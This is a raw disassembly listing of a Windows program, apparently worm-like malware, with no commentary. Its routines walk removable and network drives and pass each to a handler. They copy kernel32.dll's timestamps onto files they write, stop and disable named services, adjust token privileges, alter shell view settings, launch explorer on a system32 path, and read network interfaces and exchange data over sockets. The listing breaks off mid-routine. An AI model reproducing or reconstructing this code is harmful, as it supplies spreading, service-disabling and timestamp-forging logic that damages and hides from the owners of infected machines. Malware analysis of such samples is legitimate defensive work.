; DWORD __stdcall sub_9AB0A3(LPVOID)
sub_9AB0A3 proc near ; DATA XREF: sub_9AB2C3+6F�o
Dst = byte ptr -58h
var_54 = dword ptr -54h
hInstance = dword ptr -48h
var_34 = dword ptr -34h
Msg = MSG ptr -30h
ClassName = byte ptr -14h
push ebp
mov ebp, esp
sub esp, 58h
push esi
call sub_9AB510
push 28h ; Size
xor esi, esi
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call memset
add esp, 0Ch
push esi ; lpModuleName
mov [ebp+var_54], offset sub_9AB07D
call GetModuleHandleA
mov [ebp+hInstance], eax
call rand
push 0Ah
pop ecx
cdq
idiv ecx
lea eax, [ebp+ClassName]
add edx, ecx
push edx
push eax
call sub_9AB647
pop ecx
lea eax, [ebp+ClassName]
mov [ebp+var_34], eax
pop ecx
lea eax, [ebp+Dst]
push eax ; lpWndClass
call RegisterClassA
push esi ; lpParam
push [ebp+hInstance] ; hInstance
mov eax, 80000000h
push esi ; hMenu
push esi ; hWndParent
push eax ; nHeight
push eax ; nWidth
push eax ; Y
push eax ; X
push esi ; dwStyle
push offset Password ; lpWindowName
lea eax, [ebp+ClassName]
push eax ; lpClassName
push esi ; dwExStyle
call CreateWindowExA
test eax, eax
jz short loc_9AB14F
push edi
mov edi, GetMessageA
jmp short loc_9AB141
; ---------------------------------------------------------------------------
loc_9AB128: ; CODE XREF: sub_9AB0A3+A9�j
cmp eax, 0FFFFFFFFh
jz short loc_9AB14E
lea eax, [ebp+Msg]
push eax ; lpMsg
call TranslateMessage
lea eax, [ebp+Msg]
push eax ; lpMsg
call DispatchMessageA
loc_9AB141: ; CODE XREF: sub_9AB0A3+83�j
push esi ; wMsgFilterMax
push esi ; wMsgFilterMin
lea eax, [ebp+Msg]
push esi ; hWnd
push eax ; lpMsg
call edi ; GetMessageA
cmp eax, esi
jnz short loc_9AB128
loc_9AB14E: ; CODE XREF: sub_9AB0A3+88�j
pop edi
loc_9AB14F: ; CODE XREF: sub_9AB0A3+7A�j
xor eax, eax
pop esi
leave
retn 4
sub_9AB0A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9AB156(LPVOID)
sub_9AB156 proc near ; DATA XREF: sub_9AB2C3+57�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
Src = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
mov edi, Sleep
mov ebx, 1388h
push ebx ; dwMilliseconds
call edi ; Sleep
call GetLogicalDrives
mov [ebp+var_C], eax
mov [ebp+var_1], 0
loc_9AB17A: ; CODE XREF: sub_9AB156+91�j
test byte ptr [ebp+var_C], 1
jz short loc_9AB1DD
cmp [ebp+var_1], 1
jle short loc_9AB1DD
mov al, [ebp+var_1]
add al, 41h
mov [ebp+Src], al
lea eax, [ebp+Src]
push eax ; lpRootPathName
mov [ebp+var_7], 3Ah
mov [ebp+var_6], 5Ch
mov [ebp+var_5], 0
call GetDriveTypeA
cmp eax, 2
mov [ebp+var_10], eax
jz short loc_9AB1B1
cmp eax, 4
jnz short loc_9AB1DD
loc_9AB1B1: ; CODE XREF: sub_9AB156+54�j
push 8 ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov esi, eax
test esi, esi
jz short loc_9AB1DD
mov eax, [ebp+var_10]
mov [esi], eax
lea eax, [ebp+Src]
push eax ; Src
call _strdup
pop ecx
push esi ; LPVOID
mov [esi+4], eax
call sub_9AABA4
push ebx ; dwMilliseconds
call edi ; Sleep
loc_9AB1DD: ; CODE XREF: sub_9AB156+28�j
; sub_9AB156+2E�j ...
shr [ebp+var_C], 1
inc [ebp+var_1]
cmp [ebp+var_1], 1Ah
jl short loc_9AB17A
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_9AB156 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AB1F2 proc near ; CODE XREF: sub_9A799E+190�p
CommandLine = byte ptr -228h
var_125 = byte ptr -125h
Dest = byte ptr -124h
var_21 = byte ptr -21h
Dst = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 228h
push ebx
push esi
push edi
xor ebx, ebx
push ebx ; Data
push offset aCheckedvalue ; "CheckedValue"
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h ; hKey
call sub_9AC0F9
push 20h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call memset
add esp, 1Ch
push 1 ; bSet
push 40021h ; dwMask
lea eax, [ebp+Dst]
push eax ; lpss
call SHGetSetSettings
mov esi, 104h
push esi ; Count
lea eax, [ebp+Dest]
push offset ExistingFileName ; "c:\\windows\\system32\\oc.dll"
push eax ; Dest
call strncpy
add esp, 0Ch
mov [ebp+var_21], bl
xor edi, edi
loc_9AB255: ; CODE XREF: sub_9AB1F2+7E�j
lea eax, [ebp+Dest]
push 5Ch ; Ch
push eax ; Str
call strrchr
cmp eax, ebx
pop ecx
pop ecx
jz short loc_9AB272
inc edi
cmp edi, 3
mov [eax], bl
jl short loc_9AB255
loc_9AB272: ; CODE XREF: sub_9AB1F2+76�j
cmp [ebp+Dest], bl
jnz short loc_9AB28D
lea eax, [ebp+Dest]
push offset a__0 ; "."
push eax ; Dest
call strcpy
pop ecx
pop ecx
loc_9AB28D: ; CODE XREF: sub_9AB1F2+86�j
lea eax, [ebp+Dest]
push eax
push offset aExplorerS ; "explorer %s"
lea eax, [ebp+CommandLine]
push esi ; Count
push eax ; Dest
call _snprintf
lea eax, [ebp+CommandLine]
push 1 ; int
push eax ; lpCommandLine
mov [ebp+var_125], bl
call sub_9AC2CA
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_9AB1F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AB2C3 proc near ; CODE XREF: StartAddress:loc_9A7967�p
ThreadId = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
push offset aShell32_dll ; "shell32.dll"
call GetModuleHandleA
xor ebx, ebx
cmp eax, ebx
mov esi, offset Buffer
jz short loc_9AB301
push 100h ; cchBufferMax
push esi ; lpBuffer
push 4302h ; uID
push eax ; hInstance
call LoadStringA
test eax, eax
jz short loc_9AB301
push esi ; Str
call strlen
test eax, eax
pop ecx
jnz short loc_9AB30E
loc_9AB301: ; CODE XREF: sub_9AB2C3+1B�j
; sub_9AB2C3+31�j
push offset aOpenFolderToVi ; "Open folder to view files"
push esi ; Dest
call strcpy
pop ecx
pop ecx
loc_9AB30E: ; CODE XREF: sub_9AB2C3+3C�j
mov esi, CreateThread
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push ebx ; dwCreationFlags
push ebx ; lpParameter
push offset sub_9AB156 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call esi ; CreateThread
mov edi, CloseHandle
push eax ; hObject
call edi ; CloseHandle
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push ebx ; dwCreationFlags
push ebx ; lpParameter
push offset sub_9AB0A3 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call esi ; CreateThread
push eax ; hObject
call edi ; CloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_9AB2C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AB343 proc near ; CODE XREF: sub_9A9072:loc_9A90C0�p
; sub_9AEA12+24�p
RootPathName = byte ptr -108h
var_105 = byte ptr -105h
VolumeSerialNumber= dword ptr -4
push ebp
mov ebp, esp
sub esp, 108h
push 104h ; uSize
lea eax, [ebp+RootPathName]
push eax ; lpBuffer
mov [ebp+VolumeSerialNumber], 12345678h
call GetSystemDirectoryA
xor eax, eax
push eax ; nFileSystemNameSize
push eax ; lpFileSystemNameBuffer
push eax ; lpFileSystemFlags
push eax ; lpMaximumComponentLength
lea ecx, [ebp+VolumeSerialNumber]
push ecx ; lpVolumeSerialNumber
push eax ; nVolumeNameSize
push eax ; lpVolumeNameBuffer
mov [ebp+var_105], al
lea eax, [ebp+RootPathName]
push eax ; lpRootPathName
call GetVolumeInformationA
mov eax, [ebp+VolumeSerialNumber]
leave
retn
sub_9AB343 endp
; =============== S U B R O U T I N E =======================================
sub_9AB389 proc near ; CODE XREF: sub_9A8DB4+7�p
; sub_9AC5BB+BC�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
xor eax, eax
mov edx, ecx
and edx, 0FFFFh
inc eax
cmp edx, 0A8C0h
jz short loc_9AB3B3
cmp cl, 0Ah
jz short loc_9AB3B3
and ecx, 0F0FFh
cmp ecx, 10ACh
jnz short locret_9AB3B5
loc_9AB3B3: ; CODE XREF: sub_9AB389+15�j
; sub_9AB389+1A�j
xor eax, eax
locret_9AB3B5: ; CODE XREF: sub_9AB389+28�j
retn
sub_9AB389 endp
; =============== S U B R O U T I N E =======================================
sub_9AB3B6 proc near ; CODE XREF: sub_9AB41B+A4�p
; sub_9AC5BB+AF�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov ecx, esi
and ecx, 0FFh
xor eax, eax
cmp ecx, 7Fh
jz short loc_9AB419
test ecx, ecx
jz short loc_9AB419
mov ecx, esi
and ecx, 0FFFFh
cmp ecx, 0FEA9h
jz short loc_9AB419
mov ecx, esi
and ecx, 0FEFFh
cmp ecx, 12C6h
jz short loc_9AB419
mov ecx, esi
and ecx, 0FFFFFFh
cmp ecx, 0FFFFFDh
jz short loc_9AB419
mov ecx, esi
mov edx, 0F0h
and ecx, edx
cmp ecx, 0E0h
jz short loc_9AB419
cmp ecx, edx
jz short loc_9AB419
cmp esi, 0FFFFFFFFh
jz short loc_9AB419
inc eax
loc_9AB419: ; CODE XREF: sub_9AB3B6+12�j
; sub_9AB3B6+16�j ...
pop esi
retn
sub_9AB3B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AB41B(void *Dst, int)
sub_9AB41B proc near ; CODE XREF: sub_9ACABE+62�p
; sub_9ACABE+3AC�p
vOutBuffer = byte ptr -4C14h
s = dword ptr -14h
var_10 = dword ptr -10h
cbBytesReturned = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Dst = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 4C14h
call __alloca_probe
push ebx
push esi
mov esi, [ebp+Dst]
push edi
mov edi, [ebp+arg_4]
lea eax, [edi+edi*2]
shl eax, 2
push eax ; Size
xor ebx, ebx
push ebx ; Val
push esi ; Dst
mov [ebp+var_4], ebx
call memset
add esp, 0Ch
push ebx ; protocol
push 1 ; type
push 2 ; af
call socket
cmp eax, 0FFFFFFFFh
mov [ebp+s], eax
jz loc_9AB508
push ebx ; lpCompletionRoutine
push ebx ; lpOverlapped
lea ecx, [ebp+cbBytesReturned]
push ecx ; lpcbBytesReturned
push 4C00h ; cbOutBuffer
lea ecx, [ebp+vOutBuffer]
push ecx ; lpvOutBuffer
push ebx ; cbInBuffer
push ebx ; lpvInBuffer
push 4004747Fh ; dwIoControlCode
push eax ; s
call WSAIoctl
test eax, eax
jnz short loc_9AB4FF
mov eax, [ebp+cbBytesReturned]
push 4Ch
xor edx, edx
pop ecx
div ecx
mov [ebp+var_8], ebx
cmp eax, ebx
mov [ebp+cbBytesReturned], eax
jbe short loc_9AB4FF
lea ebx, [ebp+vOutBuffer]
add esi, 8
jmp short loc_9AB4A4
; ---------------------------------------------------------------------------
loc_9AB4A1: ; CODE XREF: sub_9AB41B+E2�j
mov edi, [ebp+arg_4]
loc_9AB4A4: ; CODE XREF: sub_9AB41B+84�j
cmp [ebp+var_4], edi
jnb short loc_9AB4FF
mov eax, [ebx+8]
mov edi, [ebx+38h]
and edi, eax
mov [ebp+var_10], eax
mov eax, [ebx]
test al, 1
jz short loc_9AB4F1
test al, 4
jnz short loc_9AB4F1
push edi
call sub_9AB3B6
test eax, eax
pop ecx
jz short loc_9AB4F1
cmp [ebp+var_10], 0
jz short loc_9AB4F1
cmp [ebp+var_10], 0FFFFFFFFh
jz short loc_9AB4F1
push dword ptr [ebx+38h] ; netlong
call __imp_ntohl_0
mov ecx, [ebp+var_10]
inc [ebp+var_4]
not eax
mov [esi-8], ecx
mov [esi-4], edi
mov [esi], eax
add esi, 0Ch
loc_9AB4F1: ; CODE XREF: sub_9AB41B+9D�j
; sub_9AB41B+A1�j ...
inc [ebp+var_8]
mov eax, [ebp+var_8]
add ebx, 4Ch
cmp eax, [ebp+cbBytesReturned]
jb short loc_9AB4A1
loc_9AB4FF: ; CODE XREF: sub_9AB41B+65�j
; sub_9AB41B+79�j ...
push [ebp+s] ; s
call closesocket
loc_9AB508: ; CODE XREF: sub_9AB41B+3D�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_9AB41B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AB510 proc near ; CODE XREF: sub_9A752A+36�p
; StartAddress+15�p ...
PerformanceCount= LARGE_INTEGER ptr -8
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
call GetCurrentThreadId
mov esi, eax
call GetCurrentProcessId
mov edi, eax
lea eax, [ebp+PerformanceCount]
push eax ; lpPerformanceCount
call QueryPerformanceCounter
test eax, eax
jnz short loc_9AB53F
and dword ptr [ebp+PerformanceCount+4], eax
mov dword ptr [ebp+PerformanceCount], 4362AEB0h
loc_9AB53F: ; CODE XREF: sub_9AB510+23�j
call GetTickCount
xor eax, dword ptr [ebp+PerformanceCount]
xor eax, edi
xor eax, esi
push eax ; Seed
call srand
pop ecx
pop edi
pop esi
leave
retn
sub_9AB510 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AB558(LPCSTR lpServiceName)
sub_9AB558 proc near ; CODE XREF: StartAddress+13A�p
; StartAddress+157�p ...
hSCObject = dword ptr -20h
ServiceStatus = _SERVICE_STATUS ptr -1Ch
lpServiceName = dword ptr 4
sub esp, 20h
push ebp
push edi
push 0F003Fh ; dwDesiredAccess
xor edi, edi
push edi ; lpDatabaseName
push edi ; lpMachineName
xor ebp, ebp
call OpenSCManagerA
cmp eax, edi
mov [esp+28h+hSCObject], eax
jz short loc_9AB5D4
push ebx
push esi
push 20022h ; dwDesiredAccess
push [esp+34h+lpServiceName] ; lpServiceName
push eax ; hSCManager
call OpenServiceA
mov ebx, CloseServiceHandle
mov esi, eax
cmp esi, edi
jz short loc_9AB5CC
lea eax, [esp+30h+ServiceStatus]
push eax ; lpServiceStatus
push 1 ; dwControl
push esi ; hService
call ControlService
mov ebp, eax
cmp ebp, edi
jz short loc_9AB5B3
push 0FA0h ; dwMilliseconds
call Sleep
loc_9AB5B3: ; CODE XREF: sub_9AB558+4E�j
push edi ; lpDisplayName
push edi ; lpPassword
push edi ; lpServiceStartName
push edi ; lpDependencies
push edi ; lpdwTagId
push edi ; lpLoadOrderGroup
push edi ; lpBinaryPathName
push 0FFFFFFFFh ; dwErrorControl
push 4 ; dwStartType
push 0FFFFFFFFh ; dwServiceType
push esi ; hService
call ChangeServiceConfigA
push esi ; hSCObject
or ebp, eax
call ebx ; CloseServiceHandle
loc_9AB5CC: ; CODE XREF: sub_9AB558+3A�j
push [esp+30h+hSCObject] ; hSCObject
call ebx ; CloseServiceHandle
pop esi
pop ebx
loc_9AB5D4: ; CODE XREF: sub_9AB558+1C�j
pop edi
mov eax, ebp
pop ebp
add esp, 20h
retn
sub_9AB558 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AB5DC(LPCSTR lpName, int)
sub_9AB5DC proc near ; CODE XREF: sub_9A7170+93�p
; sub_9A799E+4F�p
NewState = _TOKEN_PRIVILEGES ptr -14h
hObject = dword ptr -4
lpName = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
push edi
lea eax, [ebp+hObject]
push eax ; TokenHandle
push 28h ; DesiredAccess
xor edi, edi
call GetCurrentProcess
push eax ; ProcessHandle
call OpenProcessToken
test eax, eax
jz short loc_9AB642
mov eax, [ebp+arg_4]
neg eax
sbb eax, eax
and eax, 2
mov [ebp+NewState.Privileges.Attributes], eax
lea eax, [ebp+NewState.Privileges]
push eax ; lpLuid
push [ebp+lpName] ; lpName
mov [ebp+NewState.PrivilegeCount], 1
push edi ; lpSystemName
call LookupPrivilegeValueA
test eax, eax
jz short loc_9AB639
push edi ; ReturnLength
push edi ; PreviousState
push 10h ; BufferLength
lea eax, [ebp+NewState]
push eax ; NewState
push edi ; DisableAllPrivileges
push [ebp+hObject] ; TokenHandle
call AdjustTokenPrivileges
test eax, eax
jz short loc_9AB639
inc edi
loc_9AB639: ; CODE XREF: sub_9AB5DC+44�j
; sub_9AB5DC+5A�j
push [ebp+hObject] ; hObject
call CloseHandle
loc_9AB642: ; CODE XREF: sub_9AB5DC+1E�j
mov eax, edi
pop edi
leave
retn
sub_9AB5DC endp
; =============== S U B R O U T I N E =======================================
sub_9AB647 proc near ; CODE XREF: sub_9A752A+31�p
; sub_9A799E+AE�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_9AB66F
loc_9AB658: ; CODE XREF: sub_9AB647+26�j
call rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_9AB658
loc_9AB66F: ; CODE XREF: sub_9AB647+F�j
mov byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_9AB647 endp
; =============== S U B R O U T I N E =======================================
sub_9AB677 proc near ; CODE XREF: sub_9A8326+81�p
; sub_9A8326+BA�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_9AB6A0
loc_9AB688: ; CODE XREF: sub_9AB677+27�j
call rand
push 1Ah
cdq
pop ecx
idiv ecx
add edx, 61h
mov [ebx+esi*2], dx
inc esi
cmp esi, edi
jl short loc_9AB688
loc_9AB6A0: ; CODE XREF: sub_9AB677+F�j
and word ptr [ebx+edi*2], 0
pop edi
pop esi
pop ebx
retn
sub_9AB677 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AB6A9(LPCSTR lpFileName)
sub_9AB6A9 proc near ; CODE XREF: sub_9A752A+FE�p
; sub_9A8326+200�p ...
FileName = byte ptr -11Ch
LastWriteTime = _FILETIME ptr -18h
CreationTime = _FILETIME ptr -10h
LastAccessTime = _FILETIME ptr -8
lpFileName = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
push edi
push 104h ; nSize
lea eax, [ebp+FileName]
push eax ; lpFilename
push offset aKernel32_dll ; "kernel32.dll"
call GetModuleHandleA
push eax ; hModule
call GetModuleFileNameA
mov esi, CreateFileA
xor ebx, ebx
push ebx ; hTemplateFile
push ebx ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 1 ; dwShareMode
push 80000000h ; dwDesiredAccess
lea eax, [ebp+FileName]
push eax ; lpFileName
call esi ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_9AB741
lea eax, [ebp+LastWriteTime]
push eax ; lpLastWriteTime
lea eax, [ebp+LastAccessTime]
push eax ; lpLastAccessTime
lea eax, [ebp+CreationTime]
push eax ; lpCreationTime
push edi ; hFile
call GetFileTime
push edi ; hObject
mov edi, CloseHandle
call edi ; CloseHandle
push ebx ; hTemplateFile
push ebx ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 3 ; dwShareMode
push 0C0000000h ; dwDesiredAccess
push [ebp+lpFileName] ; lpFileName
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_9AB741
lea eax, [ebp+LastWriteTime]
push eax ; lpLastWriteTime
lea eax, [ebp+LastAccessTime]
push eax ; lpLastAccessTime
lea eax, [ebp+CreationTime]
push eax ; lpCreationTime
push esi ; hFile
call SetFileTime
push esi ; hObject
call edi ; CloseHandle
loc_9AB741: ; CODE XREF: sub_9AB6A9+4C�j
; sub_9AB6A9+80�j
pop edi
pop esi
pop ebx
leave
retn
sub_9AB6A9 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AB746(SIZE_T dwBytes)
sub_9AB746 proc near ; CODE XREF: sub_9A98F7+96�p
dwBytes = dword ptr 4
push [esp+dwBytes] ; dwBytes
push 9 ; dwFlags
call GetProcessHeap
push eax ; hHeap
call HeapAlloc
retn
sub_9AB746 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AB75A(LPVOID lpMem)
sub_9AB75A proc near ; CODE XREF: sub_9A98F7+271�p
lpMem = dword ptr 4
push [esp+lpMem] ; lpMem
push 0 ; dwFlags
call GetProcessHeap
push eax ; hHeap
call HeapFree
retn
sub_9AB75A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AB76E(int, LPCSTR lpFileName)
sub_9AB76E proc near ; CODE XREF: sub_9A752A+A4�p
; StartAddress+8E�p ...
var_C = dword ptr -0Ch
hObject = dword ptr -8
NumberOfBytesRead= dword ptr -4
arg_0 = dword ptr 8
lpFileName = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
xor esi, esi
push esi ; hTemplateFile
push esi ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push esi ; lpSecurityAttributes
push 3 ; dwShareMode
push 80000000h ; dwDesiredAccess
push [ebp+lpFileName] ; lpFileName
mov [ebp+var_C], esi
call CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+hObject], eax
jz short loc_9AB7EF
push ebx
push edi
push esi ; lpFileSizeHigh
push eax ; hFile
call GetFileSize
mov edi, eax
push edi ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov ebx, eax
cmp ebx, esi
jz short loc_9AB7E4
push esi ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push edi ; nNumberOfBytesToRead
push ebx ; lpBuffer
push [ebp+hObject] ; hFile
mov [ebp+NumberOfBytesRead], esi
call ReadFile
test eax, eax
jz short loc_9AB7DD
cmp [ebp+NumberOfBytesRead], edi
jnz short loc_9AB7DD
cmp [ebp+NumberOfBytesRead], esi
jz short loc_9AB7DD
mov eax, [ebp+arg_0]
mov [ebp+var_C], ebx
mov [eax], edi
jmp short loc_9AB7E4
; ---------------------------------------------------------------------------
loc_9AB7DD: ; CODE XREF: sub_9AB76E+59�j
; sub_9AB76E+5E�j ...
push ebx ; hMem
call GlobalFree
loc_9AB7E4: ; CODE XREF: sub_9AB76E+42�j
; sub_9AB76E+6D�j
push [ebp+hObject] ; hObject
call CloseHandle
pop edi
pop ebx
loc_9AB7EF: ; CODE XREF: sub_9AB76E+27�j
mov eax, [ebp+var_C]
pop esi
leave
retn
sub_9AB76E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AB7F5(LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPCSTR lpFileName)
sub_9AB7F5 proc near ; CODE XREF: sub_9A752A+C6�p
; sub_9AAAA0+B6�p ...
NumberOfBytesWritten= dword ptr -8
var_4 = dword ptr -4
lpBuffer = dword ptr 8
nNumberOfBytesToWrite= dword ptr 0Ch
lpFileName = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
xor esi, esi
push esi ; hTemplateFile
push esi ; dwFlagsAndAttributes
push 4 ; dwCreationDisposition
push esi ; lpSecurityAttributes
push 1 ; dwShareMode
push 40000000h ; dwDesiredAccess
push [ebp+lpFileName] ; lpFileName
mov [ebp+var_4], esi
call CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_9AB862
push ebx
mov ebx, [ebp+nNumberOfBytesToWrite]
push esi ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push ebx ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
mov [ebp+NumberOfBytesWritten], esi
push edi ; hFile
call WriteFile
test eax, eax
jz short loc_9AB844
cmp [ebp+NumberOfBytesWritten], ebx
jnz short loc_9AB844
mov [ebp+var_4], 1
loc_9AB844: ; CODE XREF: sub_9AB7F5+41�j
; sub_9AB7F5+46�j
push edi ; hObject
call CloseHandle
cmp [ebp+var_4], esi
pop ebx
push [ebp+lpFileName] ; lpFileName
jz short loc_9AB85C
call sub_9AB6A9
pop ecx
jmp short loc_9AB862
; ---------------------------------------------------------------------------
loc_9AB85C: ; CODE XREF: sub_9AB7F5+5D�j
call DeleteFileA
loc_9AB862: ; CODE XREF: sub_9AB7F5+26�j
; sub_9AB7F5+65�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_9AB7F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AB869(SOCKET s, u_long len, int)
sub_9AB869 proc near ; CODE XREF: sub_9AE3FA+7B�p
; sub_9AE3FA+C4�p ...
readfds = fd_set ptr -210h
exceptfds = fd_set ptr -10Ch
timeout = timeval ptr -8
s = dword ptr 8
len = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 210h
mov ecx, [ebp+arg_8]
push ebx
push esi
mov esi, [ebp+len]
push edi
mov edi, [ebp+s]
mov [ebp+timeout.tv_sec], ecx
lea ecx, [ebp+timeout]
push ecx ; timeout
xor eax, eax
lea ecx, [ebp+exceptfds]
push ecx ; exceptfds
push eax ; writefds
lea ecx, [ebp+readfds]
xor ebx, ebx
push ecx ; readfds
inc ebx
push eax ; nfds
mov [esi], eax
mov [ebp+readfds.fd_array], edi
mov [ebp+readfds.fd_count], ebx
mov [ebp+exceptfds.fd_array], edi
mov [ebp+exceptfds.fd_count], ebx
mov [ebp+timeout.tv_usec], eax
call select
cmp eax, ebx
mov [ebp+len], eax
jl short loc_9AB924
lea eax, [ebp+exceptfds]
push eax ; fd_set *
push edi ; fd
call __WSAFDIsSet
test eax, eax
jnz short loc_9AB924
lea eax, [ebp+len]
push eax ; argp
push 4004667Fh ; cmd
push edi ; s
call ioctlsocket
cmp eax, 0FFFFFFFFh
jz short loc_9AB92F
push [ebp+len] ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov ebx, eax
test ebx, ebx
jz short loc_9AB920
push 0 ; flags
push [ebp+len] ; len
push ebx ; buf
push edi ; s
call recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_9AB912
and dword ptr [esi], 0
loc_9AB912: ; CODE XREF: sub_9AB869+A4�j
cmp dword ptr [esi], 0
jnz short loc_9AB920
push ebx ; hMem
call GlobalFree
xor ebx, ebx
loc_9AB920: ; CODE XREF: sub_9AB869+90�j
; sub_9AB869+AC�j
mov eax, ebx
jmp short loc_9AB931
; ---------------------------------------------------------------------------
loc_9AB924: ; CODE XREF: sub_9AB869+59�j
; sub_9AB869+6A�j
push 274Ch ; iError
call WSASetLastError
loc_9AB92F: ; CODE XREF: sub_9AB869+7F�j
xor eax, eax
loc_9AB931: ; CODE XREF: sub_9AB869+B9�j
pop edi
pop esi
pop ebx
leave
retn
sub_9AB869 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AB936(SOCKET s, int, int, int)
sub_9AB936 proc near ; CODE XREF: sub_9AE3FA+63�p
; sub_9AE3FA+AD�p ...
writefds = fd_set ptr -210h
exceptfds = fd_set ptr -10Ch
timeout = timeval ptr -8
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
push edi
xor edi, edi
cmp [ebp+arg_8], edi
jle short loc_9AB9C1
mov esi, [ebp+s]
xor ebx, ebx
inc ebx
loc_9AB94F: ; CODE XREF: sub_9AB936+89�j
mov eax, [ebp+arg_C]
lea ecx, [ebp+timeout]
push ecx ; timeout
lea ecx, [ebp+exceptfds]
push ecx ; exceptfds
lea ecx, [ebp+writefds]
mov [ebp+timeout.tv_sec], eax
xor eax, eax
push ecx ; writefds
push eax ; readfds
push eax ; nfds
mov [ebp+writefds.fd_array], esi
mov [ebp+writefds.fd_count], ebx
mov [ebp+exceptfds.fd_array], esi
mov [ebp+exceptfds.fd_count], ebx
mov [ebp+timeout.tv_usec], eax
call select
cmp eax, ebx
jl short loc_9AB9CD
lea eax, [ebp+exceptfds]
push eax ; fd_set *
push esi ; fd
call __WSAFDIsSet
test eax, eax
jnz short loc_9AB9CD
push eax ; flags
mov eax, [ebp+arg_8]
sub eax, edi
push eax ; len
mov eax, [ebp+arg_4]
add eax, edi
push eax ; buf
push esi ; s
call send
cmp eax, 0FFFFFFFFh
jz short loc_9AB9C8
add edi, eax
cmp edi, [ebp+arg_8]
jl short loc_9AB94F
loc_9AB9C1: ; CODE XREF: sub_9AB936+11�j
mov eax, edi
loc_9AB9C3: ; CODE XREF: sub_9AB936+95�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9AB9C8: ; CODE XREF: sub_9AB936+82�j
; sub_9AB936+A2�j
or eax, 0FFFFFFFFh
jmp short loc_9AB9C3
; ---------------------------------------------------------------------------
loc_9AB9CD: ; CODE XREF: sub_9AB936+58�j
; sub_9AB936+69�j
